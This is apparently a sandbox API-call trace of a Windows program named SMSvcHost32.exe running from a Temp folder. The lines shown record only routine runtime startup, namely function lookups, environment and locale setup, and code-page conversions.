	[0096.154] GetProcAddress (hModule=0x765a0000, lpProcName="CreateEventExW") returned 0x765c66a0
	[0096.155] GetProcAddress (hModule=0x765a0000, lpProcName="CreateSemaphoreExW") returned 0x765c6700
	[0096.155] GetProcAddress (hModule=0x765a0000, lpProcName="SetThreadStackGuarantee") returned 0x765bb040
	[0096.155] GetProcAddress (hModule=0x765a0000, lpProcName="CreateThreadpoolTimer") returned 0x765bace0
	[0096.155] GetProcAddress (hModule=0x765a0000, lpProcName="SetThreadpoolTimer") returned 0x779a7dc0
	[0096.155] GetProcAddress (hModule=0x765a0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779b4010
	[0096.155] GetProcAddress (hModule=0x765a0000, lpProcName="CloseThreadpoolTimer") returned 0x779b2a50
	[0096.156] GetProcAddress (hModule=0x765a0000, lpProcName="CreateThreadpoolWait") returned 0x765ba7b0
	[0096.156] GetProcAddress (hModule=0x765a0000, lpProcName="SetThreadpoolWait") returned 0x779b2290
	[0096.156] GetProcAddress (hModule=0x765a0000, lpProcName="CloseThreadpoolWait") returned 0x779b2910
	[0096.156] GetProcAddress (hModule=0x765a0000, lpProcName="FlushProcessWriteBuffers") returned 0x779d7a60
	[0096.156] GetProcAddress (hModule=0x765a0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779cac00
	[0096.156] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentProcessorNumber") returned 0x779ba890
	[0096.157] GetProcAddress (hModule=0x765a0000, lpProcName="GetLogicalProcessorInformation") returned 0x765bac80
	[0096.157] GetProcAddress (hModule=0x765a0000, lpProcName="CreateSymbolicLinkW") returned 0x765e0830
	[0096.157] GetProcAddress (hModule=0x765a0000, lpProcName="SetDefaultDllDirectories") returned 0x775f6270
	[0096.157] GetProcAddress (hModule=0x765a0000, lpProcName="EnumSystemLocalesEx") returned 0x765bfe80
	[0096.157] GetProcAddress (hModule=0x765a0000, lpProcName="CompareStringEx") returned 0x765bff80
	[0096.157] GetProcAddress (hModule=0x765a0000, lpProcName="GetDateFormatEx") returned 0x765e0e00
	[0096.158] GetProcAddress (hModule=0x765a0000, lpProcName="GetLocaleInfoEx") returned 0x765ba750
	[0096.158] GetProcAddress (hModule=0x765a0000, lpProcName="GetTimeFormatEx") returned 0x765e1240
	[0096.158] GetProcAddress (hModule=0x765a0000, lpProcName="GetUserDefaultLocaleName") returned 0x765bad60
	[0096.158] GetProcAddress (hModule=0x765a0000, lpProcName="IsValidLocaleName") returned 0x765e1460
	[0096.158] GetProcAddress (hModule=0x765a0000, lpProcName="LCMapStringEx") returned 0x765b9a10
	[0096.158] GetProcAddress (hModule=0x765a0000, lpProcName="GetCurrentPackageId") returned 0x7757ded0
	[0096.158] GetProcAddress (hModule=0x765a0000, lpProcName="GetTickCount64") returned 0x765b3630
	[0096.159] GetProcAddress (hModule=0x765a0000, lpProcName="GetFileInformationByHandleExW") returned 0x0
	[0096.159] GetProcAddress (hModule=0x765a0000, lpProcName="SetFileInformationByHandleW") returned 0x0
	[0096.159] GetCurrentThreadId () returned 0xc24
	[0096.159] GetCommandLineA () returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz"
	[0096.159] GetEnvironmentStringsW () returned 0x25a2a08*
	[0096.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1635, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1635
	[0096.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1635, lpMultiByteStr=0x25a36d8, cbMultiByte=1635, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1635
	[0096.160] FreeEnvironmentStringsW (penv=0x25a2a08) returned 1
	[0096.160] GetStartupInfoW (in: lpStartupInfo=0x20afc0c | out: lpStartupInfo=0x20afc0c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x8225b8f2, hStdOutput=0x20afc80, hStdError=0x42b3155)) 
	[0096.160] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0096.160] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0096.160] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0096.160] GetLastError () returned 0x7f
	[0096.160] SetLastError (dwErrCode=0x7f) 
	[0096.160] GetLastError () returned 0x7f
	[0096.160] SetLastError (dwErrCode=0x7f) 
	[0096.160] GetLastError () returned 0x7f
	[0096.160] SetLastError (dwErrCode=0x7f) 
	[0096.160] GetACP () returned 0x4e4
	[0096.160] GetLastError () returned 0x7f
	[0096.160] SetLastError (dwErrCode=0x7f) 
	[0096.160] IsValidCodePage (CodePage=0x4e4) returned 1
	[0096.160] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20afc10 | out: lpCPInfo=0x20afc10) returned 1
	[0096.160] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x20af6d8 | out: lpCPInfo=0x20af6d8) returned 1
	[0096.160] GetLastError () returned 0x7f
	[0096.160] SetLastError (dwErrCode=0x7f) 
	[0096.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20afaec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0096.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20afaec, cbMultiByte=256, lpWideCharStr=0x20af458, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᤝЫĀ") returned 256
	[0096.160] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᤝЫĀ", cchSrc=256, lpCharType=0x20af6ec | out: lpCharType=0x20af6ec) returned 1
	[0096.160] GetLastError () returned 0x7f
	[0096.160] SetLastError (dwErrCode=0x7f) 
	[0096.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20afaec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0096.160] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20afaec, cbMultiByte=256, lpWideCharStr=0x20af428, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᜅЫĀ") returned 256
	[0096.160] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᜅЫĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0096.160] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᜅЫĀ", cchSrc=256, lpDestStr=0x20af218, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256
	[0096.161] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x20af9ec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x13\x0b\x70\x2a\x28\xfc\x0a\x02\x82\xbd\x2a\x04\x10\x32\x5a\x02\x30\x34\x5a\x02", lpUsedDefaultChar=0x0) returned 256
	[0096.161] GetLastError () returned 0x7f
	[0096.161] SetLastError (dwErrCode=0x7f) 
	[0096.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20afaec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0096.161] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x20afaec, cbMultiByte=256, lpWideCharStr=0x20af448, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0096.161] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0096.161] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x20af238, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256
	[0096.161] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x20af8ec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x13\x0b\x70\x2a\x28\xfc\x0a\x02\x82\xbd\x2a\x04\x10\x32\x5a\x02\x30\x34\x5a\x02", lpUsedDefaultChar=0x0) returned 256
	[0096.161] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x44a6040, nSize=0x104 | out: lpFilename="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")) returned 0x34
	[0096.161] GetLastError () returned 0x0
	[0096.161] SetLastError (dwErrCode=0x0) 
	[0096.161] GetLastError () returned 0x0
	[0096.161] SetLastError (dwErrCode=0x0) 
	[0096.161] GetLastError () returned 0x0
	[0096.161] SetLastError (dwErrCode=0x0) 
	[0096.161] GetLastError () returned 0x0
	[0096.161] SetLastError (dwErrCode=0x0) 
	[0096.161] GetLastError () returned 0x0
	[0096.161] SetLastError (dwErrCode=0x0) 
	[0096.161] GetLastError () returned 0x0
	[0096.161] SetLastError (dwErrCode=0x0) 
	[0096.161] GetLastError () returned 0x0
	[0096.161] SetLastError (dwErrCode=0x0) 
	[0096.161] GetLastError () returned 0x0
	[0096.161] SetLastError (dwErrCode=0x0) 
	[0096.161] GetLastError () returned 0x0
	[0096.161] SetLastError (dwErrCode=0x0) 
	[0096.161] GetLastError () returned 0x0
	[0096.161] SetLastError (dwErrCode=0x0) 
	[0096.161] GetLastError () returned 0x0
	[0096.161] SetLastError (dwErrCode=0x0) 
	[0096.161] GetLastError () returned 0x0
	[0096.161] SetLastError (dwErrCode=0x0) 
	[0096.161] GetLastError () returned 0x0
	[0096.161] SetLastError (dwErrCode=0x0) 
	[0096.161] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
	[0096.162] GetLastError () returned 0x0
	[0096.162] SetLastError (dwErrCode=0x0) 
